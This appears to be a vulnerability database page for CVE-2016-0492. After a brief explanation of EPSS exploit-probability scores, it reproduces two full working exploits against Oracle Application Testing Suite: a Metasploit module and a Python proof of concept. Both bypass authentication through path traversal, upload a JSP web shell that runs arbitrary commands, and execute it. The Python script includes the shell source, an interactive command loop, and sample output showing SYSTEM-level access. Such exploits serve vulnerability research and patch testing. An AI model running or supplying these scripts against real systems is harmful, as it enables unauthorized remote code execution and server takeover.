CVE-2016-0492 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle ATS Arbitrary File Upload', 'Description' => %q{ This module exploits an authentication bypass and arbitrary file upload in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and unknown earlier versions, to upload and execute a JSP shell. }, 'Author' => [ 'Zhou Yu', # Proof of concept 'wvu' # Metasploit module ], 'References' => [ %w{CVE 2016-0492}, # Auth bypass %w{CVE 2016-0491}, # File upload %w{EDB 39691} # PoC ], 'DisclosureDate' => 'Jan 20 2016', 'License' => MSF_LICENSE, 'Platform' => %w{win linux}, 'Arch' => ARCH_JAVA, 'Privileged' => true, 'Targets' => [ ['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'], ['OATS <= 12.4.0.2.0 (Linux)', 'Platform' => 'linux'] ], 'DefaultTarget' => 0 )) register_options([ Opt::RPORT(8088) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/admin/Login.do' ) if res && res.body.include?('12.4.0.2.0') CheckCode::Appears else CheckCode::Safe end end def exploit print_status("Uploading JSP shell to #{jsp_path}") upload_jsp_shell print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}") exec_jsp_shell end def upload_jsp_shell mime = Rex::MIME::Message.new mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"') mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"') mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed mime.add_part('*', nil, nil, 'form-data; name="fileType"') mime.add_part(payload.encoded, 'text/plain', nil, %Q{form-data; name="file1"; filename="#{jsp_filename}"}) mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"') mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"') mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"') register_files_for_cleanup(jsp_path) send_request_cgi( 'method' => 'POST', 'uri' => '/olt/Login.do/../../olt/UploadFileUpload.do', 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'data' => mime.to_s ) end def exec_jsp_shell send_request_cgi( 'method' => 'GET', 'uri' => "/olt/pages/#{jsp_filename}" ) end def jsp_directory case target['Platform'] when 'win' '..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages' when 'linux' '../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages' end end def jsp_filename @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp' end def jsp_path jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename end end

# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit # Exploit Author: Zhou Yu <[email protected] > # Vendor Homepage: http://www.oracle.com/ # Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn # Version: 12.4.0.2.0 # Tested on: Win7 SP1 32-bit # CVE : CVE-2016-0492 and CVE-2016-0491 import urllib2 import urllib ip = '192.168.150.239' port = 8088 url = "http://" + ip + ":" + str(port) #bypass authentication url = url+"/olt/Login.do/../../olt/UploadFileUpload.do" request = urllib2.Request(url) webshell_content=''' <%@ page import="java.util.*,java.io.*" %> <% if (request.getParameter("{cmd}") != null) {{ Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while (disr != null) {{ out.println(disr); disr = dis.readLine(); }} }} %> ''' boundary = "---------------------------7e01e2240a1e" request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary) post_data = "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n" post_data = post_data + "\r\n.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" post_data = post_data + "\r\nwebshell.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" post_data = post_data + "\r\n*\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" post_data = post_data + "Content-Type: text/plain\r\n" post_data = post_data + "\r\n" + webshell_content +"\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" post_data = post_data + "\r\nDefault\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" post_data = post_data + "\r\n.\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" post_data = post_data + "--" + boundary + "--"+"\r\n" try: request.add_data(post_data) response = urllib2.urlopen(request) if response.code == 200 : print "[+]upload done!" webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" print "[+]wait a moment,detecting whether the webshell exists..." if urllib2.urlopen(webshellurl).code == 200 : print "[+]upload webshell successfully!" print "[+]return a cmd shell" while True: cmd = raw_input(">>: ") if cmd == "exit" : break print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() else: print "[-]attack fail!" else: print "[-]attack fail!" except Exception as e: print "[-]attack fail!" ''' #run the exploit and get a cmd shell root@kali:~/Desktop# python exploit.py [+]upload done! [+]wait a moment,detecting whether the webshell exists... [+]upload webshell successfully! [+]return a cmd shell >>: whoami nt authority\system >>: exit '''